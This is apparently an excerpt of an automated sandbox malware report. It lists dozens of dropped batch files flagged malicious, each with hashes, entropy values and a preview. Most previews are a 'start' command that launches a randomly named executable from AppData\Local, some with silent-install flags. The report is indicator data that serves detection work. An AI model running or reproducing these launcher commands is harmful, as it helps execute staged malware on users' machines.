SHA-512:37F46CBB9B3012DFE9D0B46AD40CCE146364808B5A7B73309CBD8AACC6C5CB212836E961B1504280712F2A25137AF8AD44765B6CFD2D7F655BC81CB3C80AFEF6
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\ukkppf7mf9IddXdKqN6kNkCJ.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.8400347838023645
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5zzMgfClykiF:fE1sZ23wviF
MD5:FE305602949787DDCEA4B533337FFA36
SHA1:101FB72ED03896224158AC717CF79F9AB783B2AB
SHA-256:52D1EFF465224E3582FDCDA95692063E34644FA70ADADE9C581432942ED59A49
SHA-512:7E044DED3FAA63AFAF207D444FE9C3FDEE8F2EA77487ED8D43F0E6ADBDA991CCD57572C698C5BA45F4F969F2559634C7D309D6D62C3EF976AD103113973EDD94
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\VKzps0C0te7NTLkv4QCHU1YW.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):5.034046696090955
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5LRN/WRrLxmn:fE1sZ23VhoFm
MD5:65A75038D8CE0C6E236438CD793326A5
SHA1:8B2177CB7EC8CFCC6144D207AAFD34392E9ABE21
SHA-256:5265F3DAB59B1C39E2DD62404A9CB1C4ACF380D0522AFC15B92C6DB453F80426
SHA-512:ECEEA82C115F3FD2CB28A688546EE185E6C1F510E82E999D91412E69D0F1A9D3286C0A92EE4FCC4833B99AEE01DF29EB9EDA9AE13A2434F1A9F1021CCA1FBC21
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\nCCWNGZR7QSL7YK34Xz98mnq.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.753684696555501
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5VccSy1JADJl:fE1sZ23659l
MD5:E1EC04E6DBF192B6BBFE03E0B5956847
SHA1:DF4F5B813237455750AD439D975E743C2997DB55
SHA-256:EF9C00E1A2B58EE463E8F51701481585E437F4FA579653C93644737CAB8499BE
SHA-512:643E0A1C854DC0F7544A7E23EE64F2E40AC59463418A8A3416B1BB82EE444C6FB6CB947D14A15D8B92852EC9EEB16321DC038E73AB1CF2037360398EDB350986
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\p9kj7yqazy7x5QKCpeuskKjf.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.753684696555502
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5MecsQEXvgCl:fE1sZ23MeZll
MD5:AC62135624BEAB08DD84F3D3EBF267D4
SHA1:996912E3F528447366CA3CD80EC83B8B61989FE1
SHA-256:6D84BFF83352C6E864BFE5AE8F684C3F57EC707A7281136CB52CA5A88DA3952A
SHA-512:CF3A8AE3E142D9B23447D66E159D01F78ADC0C77B7278C205A63090CE3583009B15655FF716D73FA94905E19570C450377E3C2EAD16C1BEE5A0068944C2E0808
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\i5XdJ65IHwp8ssJDgSUt738t.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.825865131212691
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J51HcLKm0FP4m:fE1sZ23N6K1P4m
MD5:4ABE09697F3FAF1FCFBF331B790952BA
SHA1:7884304A6B191608EDC967EE07A9962CA32FDA57
SHA-256:A75E0781B61BC2F359FA79393B38A725A02959ED1CA4EF2F56A31D514761C9D3
SHA-512:7BB8C25ACDACD31EACE193D8FAE9D52AB738C7789C7830B562AF54FE363002B85DC6BF8DD0F801A34DAFDD3D7BF13A86C945470502043DCEA162989C9E825FBA
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\Pb9nMKWmPyxCQFZJxeJuCUeo.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.876125001130959
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J50J1WNEmSgTH4iF:fE1sZ230J1WdSQ
                                                                                                                                                                                                                                MD5:56F646EA3FB3536EB795983B6B1D3258
                                                                                                                                                                                                                                SHA1:F044FB0B62F7BD173143FB6B59B13A9D931C61D9
                                                                                                                                                                                                                                SHA-256:9FB2DC7144D6610677E2F80A148A812A5A058407CE4D1EC06B8C6C3D6ED6326C
                                                                                                                                                                                                                                SHA-512:E4855D8FB73B7E3180D2BC980FECA56F7C97BE5CA7EBD2D22AD222B8B97D128617FA8899080D7B19E5DE4C46A11D1CB8BD9882A36769465A4F5864122EAE8559
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\QbLPxQThjmTC7G98txUkfov6.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.7202570663169965
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5RnmMMOmDa6iF:fE1sZ23BmNJDuF
                                                                                                                                                                                                                                MD5:6294C940F617CE22CAC9678B04E15EF2
                                                                                                                                                                                                                                SHA1:10BBA616E43CCA3FCAC3247F65B08F2BB1BCE413
                                                                                                                                                                                                                                SHA-256:CC83F627A06367622A71E6CBD62D899A1503758AD0B8AE6CE811E0168D00572E
                                                                                                                                                                                                                                SHA-512:5798BE29756D68693BDF55508F793E6DD6EE4966FB08F24C517198600FEB112FF7FB34136379BC6692CEBCDFE04C9BCD31C6E1FCFE8439F7558769B34C5E55B5
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\tByrAP8ibeDbCSADnquqVBQi.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.905716942869603
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5djHGkVHLRQI6ca4iFn:fE1sZ23hHGcHKNcaVF
                                                                                                                                                                                                                                MD5:A559FC4727012940A277316F954FD163
                                                                                                                                                                                                                                SHA1:C061DE177BE854DE4044B1C7680168570078577D
                                                                                                                                                                                                                                SHA-256:DCE932C4B5E93A887D4B2099594B19A50C1330D3C7B423407EBE6AFBB0792852
                                                                                                                                                                                                                                SHA-512:4F67D80F9244CA0BB7A91F88968A1C17D0EA770FAB420E5396F8DA53ABDD7970343EE376B40734E43E9E27142821FFAB9783D33C9087764F2C0DC9F2464130C3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\8FauF1Ec16N4pbn45vApMB9Y.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.742137863481155
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5XU3bx7SmlbGL0diFn:fE1sZ23o7SmlbGIdm
                                                                                                                                                                                                                                MD5:3B5A8D3BAF4C3EA3CE7A7B1E64C0A167
                                                                                                                                                                                                                                SHA1:B37CCAA449F5DE8CD20E1DF5D4A3705D04718E96
                                                                                                                                                                                                                                SHA-256:6FD496E2A560A16B08539AA31F10D888D35E31E73AA7E44401DD380E96D2FF2A
                                                                                                                                                                                                                                SHA-512:E2C058A5CB7A62DEB4653B640B69F4A5FC99A83AEBF7766F1A4EB7D3E9578BE898F81F1EF3057C1CA907FBC243C74979E802BC4D508D0A1A8BCC4F9E023F6E70
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\r1G18V8V8shEwNWwtcDq5rcn.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.889119159859073
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5UpuVBJ50h8Aln:fE1sZ23Upq5lm
                                                                                                                                                                                                                                MD5:544235E7908BF8E3CBE3123D53109CA2
                                                                                                                                                                                                                                SHA1:3BDBD22B49B22C9102AE65D5B0EB590BAB3CABDE
                                                                                                                                                                                                                                SHA-256:1BC857476E1BCADE4282DFDE61D30E9EE0C427F8A7DC89FFD830F4567426D401
                                                                                                                                                                                                                                SHA-512:0D4FAC33E85F382761A53510F89F4F9023C6CB43AF1B31B8AD5DEB39D14504E44A2D0036E8232E13523EEBF79C62069C9B4047823A19C0B62F00B845D4D108A9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\10ff9npsu4lZrEUNQDLknd3T.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.89622386994129
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5SCs6Vkfo7ESsAl:fE1sZ23SCWInhl
                                                                                                                                                                                                                                MD5:645C64FCF28185FD58652725600E7678
                                                                                                                                                                                                                                SHA1:4990A53A6A3205E0AAC9246CD64D4DA2C94BB2ED
                                                                                                                                                                                                                                SHA-256:2A262C5277059B0127DDA9F911EC2ED167749DEDB8AC16A4655779C8DAF33DBE
                                                                                                                                                                                                                                SHA-512:23A84AD39AD4D4152378C584182CD3733F9D8024031B107F3D8C35C865D9F83619307AA6A85FDC450F4008188D799AC4286ED9159C3703D5F56FEE880ECF1D9D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\wgX5ZSzR0AzMXHqanPag1gRj.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.8181539866382055
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5d9KIiF:fE1sZ23/KIm
                                                                                                                                                                                                                                MD5:09EC1E80E00067EDA62E15BFA0B15866
                                                                                                                                                                                                                                SHA1:3C19FC7423405C48D02968C4626899E534D7724C
                                                                                                                                                                                                                                SHA-256:85C3A05FDBFBAEAD1A3FB307C1C9DF547A05EFB7CC6BEA6D6D9A29E7CFB8A661
                                                                                                                                                                                                                                SHA-512:B1D84AB4FF117C39D4CB828CD210AB85756B73E783A380A631B87E14AE9E11A4C81FA52B8176F297071951A5308D7DCDEF4AA7B3572DB8A6722BA8CBFC396308
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\xXfU3dY2WEStW3xUEgs7rT08.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
Entropy (8bit):4.869020291048741
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5D6eq7PuxPOH0sn:fE1sZ23iPuQHL
MD5:CCEDBE88FDA388E24684B705BDBC6247
SHA1:430C38B9298BD22F64E89BE0B2368EC55731266E
SHA-256:BFBDD8EFEA73D7D9792D8F013E12026720FE9417A7CA1F8C35D44A39A480073E
SHA-512:03D189A10F653DA1CF8A79B842CC288372FFE314D9680E5A0202FD8868E6BA50BEBEEE28A1A29B905813A2CCBC5A302E33E3A4DC8B0C7586099F1947B5ED3CDB
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\fOd8yCx7heVUBotMVvn44Lkb.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.958030572933904
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5dtWMdhTKzwNln:fE1sZ23v/HucNl
MD5:F59A8D7C03899C56B104C54771774436
SHA1:06A75439FC248A122A7891BEAFE19053B4277800
SHA-256:54EA6EAA84F10FC41F8441E3200C9D67CFBF2BBA2D01EC0B37CC639E361F325A
SHA-512:FE835520648E6B73947F523F5F918208B90D71BED6392C3F68B2334EE1A1AC6574BDF121ADDB92042C9A2122EB81DA93DE4ABCDA1E244F4C31C8797DD306D569
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\8Hs13Qx2L9GIxFG02dQv6hVO.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.918104667105449
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5t1p5qjWw:fE1sZ23HXeWw
MD5:63966E1FA5A95249E98365889EAB9465
SHA1:1A5BE4EA05AE1636E86770A5600534125169FB9C
SHA-256:7BCE376CB7223D5C32E2739EC6B39CDD7ECD8BC3E1AFAFC3D762715F7457FA22
SHA-512:9C90E07D395B650066F195F5F5194D9FD8C9233CE6FFCCDFEBE022D8DDA4E17AD8BC46991100950633C1089AB7607DF011EF7B880EF60502F3A7F3F45A99CF0B
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\HPgOzBdOCsD6vN5fCp1Y0Y3P.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):5.047517753195889
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5UmiYGu8UTnb16ASkdan:fE1sZ23UmiYGrUTnb16ASD
MD5:2D9681948D37E0501BAA190F86D76684
SHA1:27005885F6949F137A0D73CC8D775B4734AC60C2
SHA-256:0D7F6ED768185AC5D288A4ABAF55ECB5160BF25F2A6FA432A47C4A092C7BE447
SHA-512:48025E2DC4E55B964F47D8A2EC581C3072A189F6CA493472B7B87CD71E8542367FACE23623EEA33A436786105E4D9C2118A28F1791D7283476D1DB3025D92280
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\1CGwy9Tr3ZgPn871BvByOPxR.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.849193254030617
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5TTgPEmBln:fE1sZ23CBl
MD5:2DC90547CF077B561356A9C5B6B7F38F
SHA1:244A0B453EB0D07790A4A274D1464B64B13E1AE7
SHA-256:424268C17316FD8690FACE967AC20AA76D924E78AC22F8D305A5BE9E70A75DD5
SHA-512:585989381227DF80AD5DFC2E1A3C7D4D2A8886EF025A5533465B6642A4CB955B0C188C3AAEE2C70C7001F9797EC9A7B6D06E709603E414377770EFB940B20BF4
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\vMRsi4avLKS3BjZRk9vaqhZz.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.735072920973699
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5X5xisL:fE1sZ23pxisL
MD5:9901A186F671BA05615F5A6DEB986345
SHA1:A14AB5E9B7D3AE1C6DAF2FD5ABD15398295E1137
SHA-256:C3C361547183F959594FA0F8145B65CF0AC1631120A8205BBAB4D6B963926D16
SHA-512:DCC46C8D081B456D34C02919302ED67CA4503DDC35FD8AD81E4BEF5DB3DA07BB9B617A41463B31F04950B2093F82E877209F3A3AC0E6D278628EDB05ED48484A
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\rCkxIY3aeSpXebK5FfkxePC4.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.789168479391829
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5DxxfS3TNR3LAdiFn:fE1sZ23r674m
MD5:7EC599F545FC5787A1CB8FD19C266ADE
SHA1:23E0472742052A1159CDFA7B7C1D1E9CE3FFAF4D
SHA-256:109ACC7107358E125CB46FF4C0DEF9EAC75FDF339903BA1A3DC33D1F137421B8
SHA-512:4E4C8D18AA559B3AEB1D2D97C985D862B57E5E01BBFFDC1E026411CEEB9217D8BB557634B54E065D832A3A9CC72B54939AAD4BBD7FEDB3D93DE0464F15BEEABF
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\fUzbEYrAlNz7Rv11K6EiLt1x.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):5.052964697592256
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5W0cfzveqmIkdan:fE1sZ23W5zve2D
MD5:7812A6333CCDFAC832EE8C876C00313F
SHA1:93510A281EC8E6DC7F97AF1870B3893B501CDC68
SHA-256:74908A084F223267F0D491EF18C796FE1C16203B2BC47BD9389F71A057597BEA
SHA-512:27E8AC8304598C3721C6E3A7774D48E8EC27109B840A0DC66FA0C72C00E9D289874ACF539C9DDB3A565F2CA9455655CA9854C731C4434FF66A1FA8257BDE4C92
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\3CfyWUQfEPMLfwgMw9RKzj9q.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.771123370727532
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J59gtS6fycJF:fE1sZ23/6fycJF
MD5:E98184E2CC0CD7EF62631A627C84779A
SHA1:A63D183BCF844A163DCA5CE00E7D86634F4F6CD0
SHA-256:F3E85E0B6E4DB1543C01EAB199D45C85BA02DDBF12D39BE6C4DDE92F50C7C780
SHA-512:D1051E272442F61B9376F4B6C8962BEA4A39AC8C0D5321C275509E63B23B3A267F6864683D43C68354AA06BC3DF121AB2A1BB341E12B74099F0F858EA0657C24
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\XE6DyfdivLtuouzog1ddAcWy.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.871074051194774
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5WMW0Wtmbvn:fE1sZ23WMzWtmbv
MD5:F42D502F984046D7B53A4C5707BBE091
SHA1:A0EEA5A0668F90878B962BE6C0AAC04DD43CC7D5
SHA-256:3DDEB5AC7EB91AFFB8913374920D06EDD6E99A9CB6AD40F2FC793F64FC58B069
SHA-512:4C2DECE233231F5E39332B7868173E141E8BAC2A0E9DFEF4E63C67246A47DBCCE6EC8157028D768D8FB55E991F98224059E3AF05123285F83330574B6F56356E
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\sih6EQ3BvpoPxj5e02CfNWP2.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.865791037041148
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5jgNqq0CHFn:fE1sZ23UNqqJF
                                                                                                                                                                                                                                MD5:A0DB1AE16B7E57C45299468E6688BD7A
                                                                                                                                                                                                                                SHA1:DB98A94A52891ACC728597AA323CAD1357D51698
                                                                                                                                                                                                                                SHA-256:E2DA71F0CC4B29160C765B840F4483F7D0623859F6FFA8FE1042E897DD683B00
                                                                                                                                                                                                                                SHA-512:ABC842ACBF6CCCCBF8E299CD95E22C2AFF36A9A2E7728923A654821B0078839F76E61BF98980003C2ACD343474278A2326022F5D82DF2027C09957A0BFBF1E2A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\FcF2JyfJLWaSsoJShTukNm1O.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.736248414835261
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5RiMBhZEFptAdAl:fE1sZ23lAptAdAl
                                                                                                                                                                                                                                MD5:B60AD8CDA760C01045F73CC94AE09601
                                                                                                                                                                                                                                SHA1:C814F38162A74FC6FC0D488875F4F4BD135EDA06
                                                                                                                                                                                                                                SHA-256:9D3FB662C74950271DFC6B2242300993B8D1F839316BAA583A13E019B6951637
                                                                                                                                                                                                                                SHA-512:0C3E279C214717FA71AFC5862A6473351B86957C11F50628364ACE8D8EB4FEBBB7055BC7BC1D2936F512E278EBFD94903C0B3A174A45E430AAA5A1AA46754860
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\tGiGhkaVGjaUagcI8QYmh6fh.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.889119159859071
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J59UiDOVVm8O0dm:fE1sZ23B49O0dm
                                                                                                                                                                                                                                MD5:8AABFE318364B87E58B5113E7DF701F8
                                                                                                                                                                                                                                SHA1:F8B8C00B9BEAD659412204F70F13E15408E576E4
                                                                                                                                                                                                                                SHA-256:9470DA3B8EB2F61DA664C9C9717A8F42F90DF5709312C1750B8BE06CE5355598
                                                                                                                                                                                                                                SHA-512:6CD8C4DEEE3471EC9DD38830B529DFC6A2017C1EE63C7FDF39D134DEF58F30EDFF713E942A8BEC1CAA29EC42A21DEA3D7493DD385B92C1DFD6FE695A864C84CF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\XqzL1fMvCxCCFKp0SSzKRmTk.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.907164268523369
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5swD85PJiFn:fE1sZ23swqiF
                                                                                                                                                                                                                                MD5:1E0FD55883ACCDD35A5EC0BB358835DD
                                                                                                                                                                                                                                SHA1:236118200F91ECB6432DAD6296F2FEA4B0243B3D
                                                                                                                                                                                                                                SHA-256:90CDA36011E8C56C6178EAFBCCE089626214ED8CF2346AD5985EE819DB7303DF
                                                                                                                                                                                                                                SHA-512:39B2FA9FD2A9E2FD3F6BEA7B2C71D7EA93B52AFDCF3E54E5DF88706FFE59B01385EF0C0AEC3A2655F9ADC93F6FCA45D9F16E936F881705EC4503268555E715F4
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\I7GsKiDVRkgU0AqHrZJ1PiD5.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.987016080180281
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5TaX5u5VNl:fE1sZ23YeVv
                                                                                                                                                                                                                                MD5:CBFC3693175B87EE2CBB70F0C07C89B4
                                                                                                                                                                                                                                SHA1:4DCC7F755116CCED5F08746FD7A384CA17C10A2E
                                                                                                                                                                                                                                SHA-256:AE0F6288D239A009F1DB1CD1D42F69AADC9FF9641C4502227DEF040B9B2CFB99
                                                                                                                                                                                                                                SHA-512:59E6FC77103CD30D3B9C999EE9D85195237B7FB117A8348CA9EB37DFBF9BCF9EB803AC8D9D4AF2E8F3533F12C374D0CFEDBF2E6C64387F652BD3B812F02F40FD
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\6uk7M8l1XN7kn2GGjKmOMQUi.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.842088543948397
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5Jqbqeu4dI39QVLNHF:fE1sZ23Kt039aLVF
                                                                                                                                                                                                                                MD5:4BDF081DD34CFB57E6E2A3320E9B01CE
                                                                                                                                                                                                                                SHA1:27309FDC169BBABEF5368C09423B604A5AA2BBB3
                                                                                                                                                                                                                                SHA-256:E133D24301A4C28CAFA2B710F7BF085180D5B256EE2EC0E24F9236D0273EF8BD
                                                                                                                                                                                                                                SHA-512:71EF39943CF8D5CAD8116955BDA126D36070FD5DAAD5D158E39D2F4D6771D07982C0B573E6262A489CE07A839ED9791EC2575EC9359101206C3BB2D15B6F62A3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\lOl0Z8MedrKL384KSuZP1lEu.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.889119159859072
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5RtzxHq/av9:fE1sZ23LsO
                                                                                                                                                                                                                                MD5:118873A9E6F6613F5ACCC06DF4186F0E
                                                                                                                                                                                                                                SHA1:6E2A6A85A30304225958A718E3C8C2DC3E27748A
